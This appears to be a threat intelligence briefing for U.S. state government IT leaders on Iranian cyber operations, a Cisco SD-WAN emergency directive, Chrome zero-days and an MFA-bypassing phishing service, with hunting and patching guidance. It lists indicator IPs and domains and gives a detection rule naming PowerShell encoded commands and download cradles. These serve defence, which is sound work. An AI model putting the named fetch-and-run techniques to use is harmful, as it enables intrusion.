<p><em>What CIOs and CISOs of State Agencies Need to Know This Week About Converging Threats to Government IT, Critical Infrastructure, and Citizen Data</em></p>
<p>The threat environment facing U.S. state government IT organizations shifted materially in the first two weeks of March 2026. What was previously a strategic warning about Iranian retaliatory cyber operations following Operation Epic Fury (February 28) has now become confirmed, multi-vector offensive activity — with U.S. airports, banks, medical technology companies, and software firms already compromised. Simultaneously, CISA issued an emergency directive over actively exploited Cisco SD-WAN vulnerabilities, Google patched two zero-day Chrome flaws under active exploitation, and a new phishing-as-a-service platform emerged that defeats multi-factor authentication on Microsoft 365.</p>
<p>For state CIOs and CISOs, the convergence is stark: the same infrastructure types your agencies operate — enterprise IT, building management systems, airports, citizen-facing web services — are being actively targeted by nation-state actors and criminal operators right now.</p>
<p><strong>This post covers what changed, who is behind it, what to expect next, and exactly what your teams should do about it — organized by urgency.</strong></p>
<h2>What Changed: The Week of March 3–15, 2026</h2>
<p>Seven developments in the past two weeks fundamentally altered the risk calculus for state government IT:</p>
<ol> <li><strong>Iran's MuddyWater breached a U.S. airport, bank, and software company</strong> using a new custom backdoor called <strong>Dindoor</strong> — confirming that Iranian intelligence operations have moved from posturing to active network penetration of U.S. entities.</li> <li><strong>The pro-Iranian group Handala executed a devastating wiper attack on Stryker Corporation</strong>, claiming 200,000 devices were erased. This is the same group that previously weaponized Microsoft Intune (MDM) to deploy wipers — a technique directly relevant to any organization using Intune for endpoint management.</li> <li><strong>CISA issued Emergency Directive ED 26-03</strong> over two actively exploited Cisco Catalyst SD-WAN Manager vulnerabilities (<strong>CVE-2026-20122</strong> and <strong>CVE-2026-20128</strong>), with exploitation attributed to "highly sophisticated" actors.</li> <li><strong>Google released an emergency Chrome 146 update</strong> patching two zero-day vulnerabilities (in the Skia graphics engine and V8 JavaScript engine) under active exploitation — affecting every Chrome browser on every state employee workstation.</li> <li><strong>A new phishing-as-a-service platform called "Starkiller"</strong> emerged as the successor to the recently dismantled Tycoon2FA, featuring live adversary-in-the-middle reverse proxying and <strong>OAuth device code abuse</strong> that bypasses MFA — including conditional access policies that rely on device compliance.</li> <li><strong>Ransomware groups Qilin and Interlock continue to actively target government entities</strong>, with Interlock deploying AI-generated malware variants and recent municipal incidents in Connecticut underscoring that state and local government remains a primary ransomware target.</li> <li><strong>CISA published five ICS/BMS advisories in a single week</strong> covering Honeywell, Trane, Siemens, and Ignition SCADA systems — all commonly deployed in state government facilities — signaling elevated risk to operational technology environments.</li>
</ol>
<h2>Threat Timeline </h2>
<table> <tbody> <tr> <td> <p><strong>Date</strong></p> </td> <td> <p><strong>Event</strong></p> </td> <td> <p><strong>Significance</strong></p> </td> </tr> <tr> <td> <p>2026-02-19</p> </td> <td> <p>Starkiller PhaaS platform identified by Abnormal AI; reported by Dark Reading, Krebs on Security</p> </td> <td> <p>Successor to Tycoon2FA with MFA-bypass capabilities targeting Microsoft 365</p> </td> </tr> <tr> <td> <p>2026-02-25</p> </td> <td> <p>Cisco publishes advisories for CVE-2026-20122 and CVE-2026-20128</p> </td> <td> <p>SD-WAN Manager API file overwrite and credential exposure vulnerabilities</p> </td> </tr> <tr> <td> <p>2026-02-26</p> </td> <td> <p>CISA issues initial Emergency Directive ED 26-03 for Cisco SD-WAN</p> </td> <td> <p>Federal agencies ordered to patch; signals severity for all government users</p> </td> </tr> <tr> <td> <p>2026-02-28</p> </td> <td> <p>Operation Epic Fury — U.S. kinetic strikes on Iranian IRGC targets</p> </td> <td> <p>Triggers retaliatory cyber posture from Iranian state and proxy actors</p> </td> </tr> <tr> <td> <p>2026-03-03</p> </td> <td> <p>FBI issues reminder to critical infrastructure organizations on Iranian retaliation</p> </td> <td> <p>State governments explicitly named as potential targets</p> </td> </tr> <tr> <td> <p>2026-03-05</p> </td> <td> <p>MuddyWater breaches U.S. bank, airport, non-profit, and software company using Dindoor backdoor</p> </td> <td> <p>Confirmed Iranian espionage operations inside U.S. networks</p> </td> </tr> <tr> <td> <p>2026-03-10</p> </td> <td> <p>CISA publishes ICS advisories for Honeywell IQ4x BMS, Trane Tracer, Siemens SIMATIC, Ignition SCADA</p> </td> <td> <p>Five ICS/BMS advisories in one week — all common in state government facilities</p> </td> </tr> <tr> <td> <p>2026-03-11</p> </td> <td> <p>Handala wiper attack on Stryker Corporation; 200,000 devices claimed wiped</p> </td> <td> <p>Escalation of Iranian destructive operations against U.S.-allied companies</p> </td> </tr> <tr> <td> <p>2026-03-12</p> </td> <td> <p>CISA issues supplemental hunt-and-hardening guidance for Cisco SD-WAN</p> </td> <td> <p>Confirms "widely exploited" status; nation-state attribution implied</p> </td> </tr> <tr> <td> <p>2026-03-13</p> </td> <td> <p>Google releases emergency Chrome 146 update for two actively exploited zero-days</p> </td> <td> <p>All Chrome-based browsers on state endpoints require immediate patching</p> </td> </tr> <tr> <td> <p>2026-03-15</p> </td> <td> <p>GovTech reports: "New Federal Strategies, Rising Risk From Iran Top Cyber Themes"</p> </td> <td> <p>Public-sector conference confirms Iranian cyber threat as top government concern</p> </td> </tr> </tbody>
</table>
<h2>Threat Analysis</h2>
<h3>1. Iranian Multi-Vector Retaliation: Three Actor Groups, One Strategic Objective</h3>
<p>The Iranian cyber threat to U.S. state government has matured from theoretical to operational. Three distinct Iranian actor groups are now conducting confirmed operations against U.S. targets:</p>
<p><strong>MuddyWater</strong> (aliases: Mango Sandstorm, Static Kitten, TA450, Seedworm, MERCURY, Boggy Serpens, COBALT ULSTER, Earth Vetala, TEMP.Zagros) — Iran's Ministry of Intelligence and Security (MOIS) espionage unit. MuddyWater's deployment of the <strong>Dindoor</strong> backdoor (also tracked as <strong>Tsundere</strong>) into U.S. networks — including an airport, which is often a state or local government entity — represents a direct threat to state IT environments. MuddyWater is known for targeting government, energy, financial services, aerospace, defense, education, and telecommunications sectors across 45+ countries. Their signature tradecraft includes heavy use of PowerShell, living-off-the-land techniques, and custom C2 infrastructure.</p>
<p><strong>Handala</strong> (aliases: Void Manticore, Banished Kitten, Storm-842, Red Sandstorm, UNC5203, KarMa, HomeLandJustice) — An MOIS-affiliated destructive operations group operating under the cover of pro-Palestinian hacktivism. Their malware arsenal includes the <strong>Handala Wiper</strong> (MBR-based), <strong>CaddyWiper</strong>, <strong>ZeroCleare</strong>, and a newer <strong>AI-assisted PowerShell wiper</strong>. They also deploy the commercial infostealer <strong>Rhadamanthys</strong>. The Stryker attack demonstrates their willingness and capability to inflict mass destruction on U.S.-allied organizations. Their documented technique of weaponizing <strong>Microsoft Intune</strong> to deploy wipers is particularly alarming for any organization using MDM for endpoint management.</p>
<p><strong>The broader Iranian cyber apparatus</strong> — Intelligence reporting describes a systematic framework within Iranian cyber operations where espionage teams (such as APT34/OilRig, affiliated with MOIS) establish initial access, then hand off victims to destruction teams (Handala/Banished Kitten, MOIS-affiliated) for wiper deployment and psychological operations. This "access-then-destroy" pipeline means that a quiet espionage intrusion today could become a destructive wiper attack tomorrow.</p>
<p><strong>Why this matters for state government:</strong> State agencies operate the same categories of infrastructure being actively targeted — airports, building management systems, enterprise IT with Microsoft 365 and Intune, VPN concentrators, and SCADA/ICS for water and transportation. The FBI's March 3 reminder explicitly named state governments as potential targets for Iranian retaliation.</p>
<h3>2. Cisco SD-WAN: Emergency Directive With Nation-State Implications</h3>
<p>CISA's Emergency Directive ED 26-03 addresses two vulnerabilities in Cisco Catalyst SD-WAN Manager that are under active exploitation:</p>
<table> <tbody> <tr> <td> <p><strong>CVE</strong></p> </td> <td> <p><strong>CVSS</strong></p> </td> <td> <p><strong>Description</strong></p> </td> <td> <p><strong>Risk</strong></p> </td> </tr> <tr> <td> <p><strong>CVE-2026-20128</strong></p> </td> <td> <p>7.5 (HIGH)</p> </td> <td> <p>Data Collection Agent credential file exposure — allows authenticated attacker to read DCA passwords and pivot to other systems</p> </td> <td> <p>Lateral movement enabler</p> </td> </tr> <tr> <td> <p><strong>CVE-2026-20122</strong></p> </td> <td> <p>5.4 (MEDIUM)</p> </td> <td> <p>API file overwrite — allows authenticated attacker to overwrite arbitrary files and gain vmanage privileges</p> </td> <td> <p>Privilege escalation</p> </td> </tr> </tbody>
</table>
<p>While the individual CVSS scores appear moderate, the chained exploitation of these vulnerabilities by "highly sophisticated" actors (SecurityWeek's characterization) suggests nation-state-level operations. The CISA emergency directive — a tool reserved for the most urgent threats — applies to federal agencies but signals the severity for all government users. <strong>Systems running Cisco Catalyst SD-WAN Manager below version 20.18 are affected.</strong></p>
<h3>3. Chrome Zero-Days: Universal Endpoint Exposure</h3>
<p>Google's emergency Chrome 146 release (version 146.0.7680.75/76) patches two zero-day vulnerabilities under active exploitation:</p>
<ul> <li><strong>Skia graphics engine flaw</strong> — enables remote code execution within the browser sandbox</li> <li><strong>V8 JavaScript engine flaw</strong> — enables sensitive information disclosure</li>
</ul>
<p>With Chrome as the dominant browser across government endpoints, every state employee workstation is a potential attack surface. These vulnerabilities enable <strong>drive-by compromise</strong> (MITRE ATT&CK T1189) — a user simply visiting a malicious or compromised website can be exploited without any additional interaction.</p>
<h3>4. Starkiller PhaaS: MFA Is No Longer Enough</h3>
<p>The Europol-led takedown of the Tycoon2FA phishing platform in early March created a temporary disruption in the adversary-in-the-middle (AitM) phishing ecosystem. That gap has already been filled. <strong>Starkiller</strong>, documented by Krebs on Security, Dark Reading, and Abnormal AI, offers:</p>
<ul> <li><strong>Live reverse proxying</strong> of real login pages (not static clones) — making phishing pages virtually indistinguishable from legitimate ones</li> <li><strong>Real-time MFA token interception</strong> — capturing and replaying session cookies as users authenticate</li> <li><strong>OAuth device code abuse</strong> — a technique that hijacks Microsoft 365 accounts by exploiting the device code authentication flow, bypassing conditional access policies that rely on device compliance</li>
</ul>
<p>For state agencies running Microsoft 365 and Azure AD (Entra ID), the OAuth device code vector is particularly dangerous. Many state tenants rely on conditional access policies that check device compliance — Starkiller's OAuth abuse circumvents this entirely.</p>
<h3>5. Ransomware: Qilin and Interlock Continue Targeting Government</h3>
<p>The <strong>Qilin</strong> ransomware operation (also tracked as AGENDA, AGENDA.RUST) continues to target government, healthcare, manufacturing, and transportation sectors. Qilin claimed Tulsa International Airport in February and was linked to over 1,000 breaches in 2025. The <strong>Interlock</strong> ransomware group (tracked via Hive0163) is deploying AI-generated malware variants (<strong>Slopoly</strong>) that lower the barrier for less-skilled operators. Recent municipal ransomware incidents in Connecticut (New Britain, Meriden) underscore that state and local government remains a primary target.</p>
<h3>6. ICS/Building Management: Five CISA Advisories in One Week</h3>
<p>The week of March 10 saw an unusual concentration of CISA ICS advisories affecting systems commonly deployed in state government facilities:</p>
<table> <tbody> <tr> <td> <p><strong>System</strong></p> </td> <td> <p><strong>Advisory</strong></p> </td> <td> <p><strong>Relevance to State Government</strong></p> </td> </tr> <tr> <td> <p><strong>Honeywell IQ4x BMS</strong></p> </td> <td> <p>ICSA-26-069-03</p> </td> <td> <p>Building automation controllers in state office buildings</p> </td> </tr> <tr> <td> <p><strong>Trane Tracer HVAC</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>HVAC management in state facilities</p> </td> </tr> <tr> <td> <p><strong>Siemens SIMATIC</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>Industrial control systems in state-operated utilities</p> </td> </tr> <tr> <td> <p><strong>Siemens RUGGEDCOM APE1808</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>References FortiOS vulnerabilities in industrial products</p> </td> </tr> <tr> <td> <p><strong>Ignition SCADA</strong></p> </td> <td> <p>CISA ICS advisory</p> </td> <td> <p>SCADA systems for water/wastewater treatment</p> </td> </tr> </tbody>
</table>
<p>State agencies operating water treatment facilities, building management systems, or transportation infrastructure should treat these advisories as high-priority.</p>
<h2>Predictive Analysis: What to Expect in the Next 14–30 Days</h2>
<table> <tbody> <tr> <td> <p><strong>Scenario</strong></p> </td> <td> <p><strong>Probability</strong></p> </td> <td> <p><strong>Basis</strong></p> </td> </tr> <tr> <td> <p>Additional Iranian retaliatory cyber operations against U.S. government and critical infrastructure entities</p> </td> <td> <p><strong>70%</strong></p> </td> <td> <p>Three Iranian actor groups already active; FBI warning issued; Operation Epic Fury escalation trajectory</p> </td> </tr> <tr> <td> <p>Starkiller PhaaS campaigns targeting government Microsoft 365 tenants within 30 days</p> </td> <td> <p><strong>60%</strong></p> </td> <td> <p>Platform is commercially available; Tycoon2FA customer base migrating; government M365 tenants are high-value targets</p> </td> </tr> <tr> <td> <p>Cisco SD-WAN exploitation attributed to a nation-state actor within 14 days</p> </td> <td> <p><strong>50%</strong></p> </td> <td> <p>CISA emergency directive language and "highly sophisticated" characterization suggest classified attribution exists</p> </td> </tr> <tr> <td> <p>Wiper attack against a U.S. state or local government entity within 30 days</p> </td> <td> <p><strong>40%</strong></p> </td> <td> <p>Handala's expanding target scope (from Israel-focused to U.S. companies); MDM-based deployment technique applicable to any Intune environment</p> </td> </tr> <tr> <td> <p>Exploitation of ICS/BMS vulnerabilities in state government facilities</p> </td> <td> <p><strong>30%</strong></p> </td> <td> <p>Five advisories in one week; Iranian actors have demonstrated OT interest; but exploitation requires specialized access</p> </td> </tr> </tbody>
</table>
<h2>SOC Operational Guidance</h2>
<h3>Priority Hunting Hypotheses</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Hypothesis</strong></p> </td> <td> <p><strong>ATT&CK Technique</strong></p> </td> <td> <p><strong>Data Source</strong></p> </td> <td> <p><strong>Priority</strong></p> </td> </tr> <tr> <td> <p>1</p> </td> <td> <p>Iranian actors have established persistence via PowerShell-based backdoors (Dindoor/Tsundere pattern)</p> </td> <td> <p>T1059.001 (PowerShell), T1071.001 (Web C2), T1105 (Ingress Tool Transfer)</p> </td> <td> <p>EDR telemetry, PowerShell script block logging, proxy logs</p> </td> <td> <p><strong>CRITICAL</strong></p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p>Adversary has abused OAuth device code flow to hijack M365 accounts</p> </td> <td> <p>T1528 (Steal Application Access Token), T1078.004 (Cloud Accounts)</p> </td> <td> <p>Azure AD sign-in logs — filter for deviceCode grant type from unexpected geolocations</p> </td> <td> <p><strong>HIGH</strong></p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p>MDM (Intune) has been used to deploy unauthorized applications or scripts</p> </td> <td> <p>T1072 (Software Deployment Tools), T1078 (Valid Accounts)</p> </td> <td> <p>Intune audit logs, application deployment history, compliance policy changes</p> </td> <td> <p><strong>HIGH</strong></p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p>Cisco SD-WAN Manager API has been accessed by unauthorized users or from unexpected IPs</p> </td> <td> <p>T1190 (Exploit Public-Facing Application), T1552.001 (Credentials in Files)</p> </td> <td> <p>SD-WAN Manager access logs, API audit trails</p> </td> <td> <p><strong>HIGH</strong></p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p>Session cookie replay from non-standard geolocations indicating AitM phishing success</p> </td> <td> <p>T1539 (Steal Web Session Cookie), T1557 (Adversary-in-the-Middle)</p> </td> <td> <p>Azure AD sign-in logs — impossible travel, token replay detection</p> </td> <td> <p><strong>MEDIUM</strong></p> </td> </tr> </tbody>
</table>
<h3>Prioritized IOCs for Monitoring</h3>
<p><strong>MuddyWater C2 Infrastructure</strong> (historical, high-confidence — monitor for any connection attempts):</p>
<table> <tbody> <tr> <td> <p><strong>IOC</strong></p> </td> <td> <p><strong>Type</strong></p> </td> <td> <p><strong>Context</strong></p> </td> <td> <p><strong>Confidence</strong></p> </td> </tr> <tr> <td> <p>193.109.120[.]59</p> </td> <td> <p>IPv4</p> </td> <td> <p>MuddyWater/DarkBeatC2 infrastructure (BlueVPS, Estonia)</p> </td> <td> <p>High</p> </td> </tr> <tr> <td> <p>5.252.23[.]52</p> </td> <td> <p>IPv4</p> </td> <td> <p>MuddyWater/DarkBeatC2 infrastructure (Stark Industries, Slovakia)</p> </td> <td> <p>High</p> </td> </tr> </tbody>
</table>
<p><strong>Malware families to detect:</strong></p>
<ul> <li><strong>Dindoor / Tsundere</strong> (ThreatStream ID: 900997) — MuddyWater's new custom backdoor. Request full IOC package from your threat intelligence provider.</li> <li><strong>Handala Wiper</strong> — MBR-based wiper; <strong>CaddyWiper</strong>; <strong>ZeroCleare</strong> — known Handala/Void Manticore destructive tools</li> <li><strong>Rhadamanthys</strong> — commercial infostealer deployed by Handala for credential harvesting</li> <li><strong>Slopoly</strong> — AI-generated malware variant associated with Hive0163/Interlock ransomware operations</li>
</ul>
<p><strong>Domains to block:</strong></p>
<ul> <li>handala-hack[.]to — Handala data leak site</li> <li>handala-alert[.]to — Handala news/propaganda site</li> <li>handala-redwanted[.]to — Handala targeting/doxing site</li>
</ul>
<h3>Detection Engineering Priorities</h3>
<ol> <li><strong>Azure AD / Entra ID:</strong> Create alerts for OAuth device code authentication (grant_type=urn:ietf:params:oauth:grant-type:device_code) from any user not explicitly authorized for device code flow. Correlate with impossible travel and new device registrations.</li> <li><strong>PowerShell monitoring:</strong> Ensure Script Block Logging (Event ID 4104) and Module Logging are enabled. Alert on obfuscated PowerShell execution, encoded commands (-enc), and download cradles (Invoke-WebRequest, Net.WebClient).</li> <li><strong>Intune/MDM:</strong> Monitor for new application deployments, compliance policy modifications, and configuration profile changes outside of approved change windows.</li> <li><strong>Network edge:</strong> Monitor Cisco SD-WAN Manager API access logs for unusual file operations, credential file access, and authentication from unexpected sources.</li> <li><strong>Chrome version compliance:</strong> Use your endpoint management platform to verify Chrome 146.0.7680.75+ deployment across all managed endpoints. Flag any endpoints running older versions as non-compliant.</li>
</ol>
<h2>Sector-Specific Defensive Priorities</h2>
<h3>State Government Agencies (Executive Branch IT)</h3>
<ul> <li><strong>Immediate:</strong> Block OAuth device code flow in Entra ID conditional access unless explicitly required by specific applications. Audit the last 30 days of device code authentications.</li> <li><strong>Immediate:</strong> Push Chrome 146 to all managed endpoints via SCCM/Intune within 48 hours.</li> <li><strong>7-day:</strong> Conduct retroactive SIEM hunt for MuddyWater/Dindoor indicators (PowerShell-based C2, connections to known MuddyWater infrastructure).</li> <li><strong>7-day:</strong> Verify Intune hardening — restrict application deployment to approved administrators only; enable BitLocker recovery key escrow; audit compliance policy change history.</li> <li><strong>30-day:</strong> Conduct tabletop exercise for Iranian wiper scenario targeting state IT via MDM or VPN compromise.</li>
</ul>
<h3>Financial Services (State Treasury, Revenue, Payment Processing)</h3>
<ul> <li><strong>Immediate:</strong> Alert on Starkiller-pattern AitM phishing — session cookie replay, impossible travel in M365 sign-in logs.</li> <li><strong>7-day:</strong> Review third-party payment processor security posture (BridgePay-type vendor risk). Ransomware attacks on payment vendors can disrupt state revenue collection.</li> <li><strong>7-day:</strong> Hunt for MuddyWater indicators — a U.S. bank was among confirmed Dindoor victims.</li> <li><strong>30-day:</strong> Evaluate FIDO2/passkey deployment for high-privilege financial system accounts.</li>
</ul>
<h3>Energy & Water Utilities (State-Operated or Overseen)</h3>
<ul> <li><strong>Immediate:</strong> Inventory all Honeywell IQ4x BMS controllers, Trane Tracer HVAC systems, Siemens SIMATIC PLCs, and Ignition SCADA deployments. Apply CISA ICS advisory mitigations.</li> <li><strong>7-day:</strong> Verify network segmentation between IT and OT environments. Iranian actors conducting pre-positioning operations target the IT/OT boundary.</li> <li><strong>7-day:</strong> Review FortiOS versions on any FortiGate appliances protecting OT networks — the Siemens RUGGEDCOM advisory references FortiOS vulnerabilities in industrial products.</li> <li><strong>30-day:</strong> Evaluate dedicated OT threat intelligence subscription (e.g., Dragos WorldView) to close visibility gaps in industrial control system threats.</li>
</ul>
<h3>Healthcare (State Medicaid, Public Health, State Hospitals)</h3>
<ul> <li><strong>Immediate:</strong> The Handala wiper attack on Stryker Corporation (medical technology) demonstrates that healthcare-adjacent organizations are in the Iranian target set. Review MDM security posture for any state health agency using Intune.</li> <li><strong>7-day:</strong> Ensure Qilin/AGENDA ransomware detection signatures are current — healthcare is a primary Qilin target sector.</li> <li><strong>7-day:</strong> Audit PII repositories (Medicaid, public health records) for access anomalies — these datasets are high-value targets for both espionage and ransomware operators.</li> <li><strong>30-day:</strong> Review incident response plans for destructive attack scenarios (wiper, not just ransomware).</li>
</ul>
<h3>Aviation & Transportation (State DOT, State-Managed Airports)</h3>
<ul> <li><strong>Immediate:</strong> MuddyWater's confirmed breach of a U.S. airport makes this sector a top priority. Hunt for Dindoor/Tsundere indicators in airport and DOT network environments.</li> <li><strong>7-day:</strong> Review Cisco SD-WAN deployments in transportation management systems. If running SD-WAN Manager below version 20.18, initiate emergency patching.</li> <li><strong>7-day:</strong> Audit VPN access logs for transportation management and traffic control systems — credential theft targeting VPN infrastructure is an active threat.</li> <li><strong>30-day:</strong> Assess physical security implications of cyber compromise to transportation SCADA systems (traffic management, bridge controls, tunnel ventilation).</li>
</ul>
<h2>Prioritized Defense Recommendations </h2>
<h3>🔴 Immediate (24–48 Hours)</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Action</strong></p> </td> <td> <p><strong>Owner</strong></p> </td> <td> <p><strong>Why Now</strong></p> </td> </tr> <tr> <td> <p>1</p> </td> <td> <p><strong>Push Chrome 146.0.7680.75/76 to all managed endpoints</strong></p> </td> <td> <p>Endpoint Engineering</p> </td> <td> <p>Two zero-days under active exploitation; every Chrome browser is exposed</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p><strong>Audit Cisco SD-WAN Manager version; emergency patch to 20.18+ if below</strong></p> </td> <td> <p>Network Engineering</p> </td> <td> <p>CISA Emergency Directive ED 26-03; CVE-2026-20122 and CVE-2026-20128 under active exploitation</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p><strong>Block OAuth device code flow in Azure AD/Entra ID conditional access</strong></p> </td> <td> <p>IAM / Cloud Security</p> </td> <td> <p>Starkiller PhaaS actively abusing this flow to bypass MFA on Microsoft 365</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p><strong>Verify VMware Aria Operations patching</strong> (if deployed)</p> </td> <td> <p>Infrastructure</p> </td> <td> <p>CVE-2026-22719 (CVSS 8.1, command injection) added to CISA KEV</p> </td> </tr> </tbody>
</table>
<h3>🟠 7-Day Actions</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Action</strong></p> </td> <td> <p><strong>Owner</strong></p> </td> <td> <p><strong>Why This Week</strong></p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p><strong>Hunt for MuddyWater/Dindoor indicators</strong> across SIEM and EDR</p> </td> <td> <p>SOC / Threat Hunt</p> </td> <td> <p>Confirmed breaches of U.S. airport, bank, and software company; state agencies are in the target aperture</p> </td> </tr> <tr> <td> <p>6</p> </td> <td> <p><strong>Harden Intune MDM against unauthorized deployments</strong></p> </td> <td> <p>Endpoint Engineering</p> </td> <td> <p>Handala's documented technique of weaponizing Intune for wiper deployment</p> </td> </tr> <tr> <td> <p>7</p> </td> <td> <p><strong>Inventory and patch ICS/BMS systems</strong> (Honeywell IQ4x, Trane Tracer, Siemens SIMATIC, Ignition SCADA)</p> </td> <td> <p>Facilities / OT Security</p> </td> <td> <p>Five CISA ICS advisories in one week affecting common state government systems</p> </td> </tr> <tr> <td> <p>8</p> </td> <td> <p><strong>Review and restrict Intune application deployment permissions</strong></p> </td> <td> <p>IAM / Endpoint</p> </td> <td> <p>Limit deployment rights to named administrators; enable deployment approval workflows</p> </td> </tr> <tr> <td> <p>9</p> </td> <td> <p><strong>Audit Azure AD sign-in logs for AitM indicators</strong></p> </td> <td> <p>SOC</p> </td> <td> <p>Session cookie replay, impossible travel, unexpected device code authentications</p> </td> </tr> </tbody>
</table>
<h3>🟡 30-Day Actions</h3>
<table> <tbody> <tr> <td> <p><strong>#</strong></p> </td> <td> <p><strong>Action</strong></p> </td> <td> <p><strong>Owner</strong></p> </td> <td> <p><strong>Why This Month</strong></p> </td> </tr> <tr> <td> <p>10</p> </td> <td> <p><strong>Conduct Iranian wiper/espionage tabletop exercise</strong></p> </td> <td> <p>CISO Office / IR Team</p> </td> <td> <p>Three Iranian actor groups conducting confirmed operations against U.S. targets; state government is in the target set</p> </td> </tr> <tr> <td> <p>11</p> </td> <td> <p><strong>Evaluate FIDO2/passkey deployment for high-privilege accounts</strong></p> </td> <td> <p>IAM</p> </td> <td> <p>Phishing-resistant MFA is the only strategic countermeasure to AitM phishing (Starkiller and successors)</p> </td> </tr> <tr> <td> <p>12</p> </td> <td> <p><strong>Assess OT threat intelligence coverage</strong></p> </td> <td> <p>CTI / CISO Office</p> </td> <td> <p>Five ICS advisories with minimal supplementary intelligence; dedicated OT intel feed needed</p> </td> </tr> <tr> <td> <p>13</p> </td> <td> <p><strong>Review MSP and third-party vendor security posture</strong></p> </td> <td> <p>Vendor Management</p> </td> <td> <p>ConnectWise 2026 MSP Threat Report warns identity abuse is redefining MSP risk; Black Kite reports 136 verified supply chain breaches in 2025 with 5x downstream impact</p> </td> </tr> <tr> <td> <p>14</p> </td> <td> <p><strong>Brief state agency heads on Iranian cyber threat</strong></p> </td> <td> <p>CIO / CISO</p> </td> <td> <p>Executive awareness is essential for rapid decision-making if a destructive attack occurs</p> </td> </tr> </tbody>
</table>
<h3>Executive / IR Preparedness</h3>
<ul> <li><strong>Decision pre-authorization:</strong> Obtain advance approval from agency leadership for emergency patching windows and network segment isolation — so that when (not if) an incident occurs, the SOC can act without waiting for authorization.</li> <li><strong>IR retainer validation:</strong> Confirm your incident response retainer is active and that your IR provider has current network diagrams, contact trees, and escalation procedures.</li> <li><strong>Communication plan:</strong> Prepare draft public communications for a destructive cyber incident affecting citizen services. The Stryker attack took thousands of employees offline — a similar attack on state systems would immediately affect millions of residents.</li> <li><strong>Federal coordination:</strong> Despite ongoing CISA budget constraints and leadership transitions, maintain active communication with your CISA regional office and FBI field office. The FBI's March 3 reminder to critical infrastructure organizations is an invitation to engage.</li>
</ul>
<h2>The Bottom Line</h2>
<p>The convergence of Iranian retaliatory operations, actively exploited network infrastructure vulnerabilities, browser zero-days, and MFA-defeating phishing platforms creates a threat environment that demands immediate, coordinated action from state government IT leadership.</p>
<p>This is not a drill. Iranian state actors have already breached a U.S. airport, a bank, and a software company. A pro-Iranian group has already wiped 200,000 devices at a major U.S. corporation using MDM — the same technology your agencies use to manage endpoints. CISA has issued an emergency directive for network infrastructure that many state agencies rely on.</p>
<p><strong>The three decisions that matter most right now:</strong></p>
<ol> <li><strong>Authorize emergency patching</strong> for Chrome and Cisco SD-WAN — today, not next maintenance window.</li> <li><strong>Block OAuth device code flow</strong> in your Microsoft 365 environment — before Starkiller campaigns reach your users.</li> <li><strong>Start planning for a destructive attack</strong> — tabletop an Iranian wiper scenario within 30 days, because the actors, tools, and motivation are all in place.</li>
</ol>
<p>The threat actors are not waiting. Neither should you.</p>
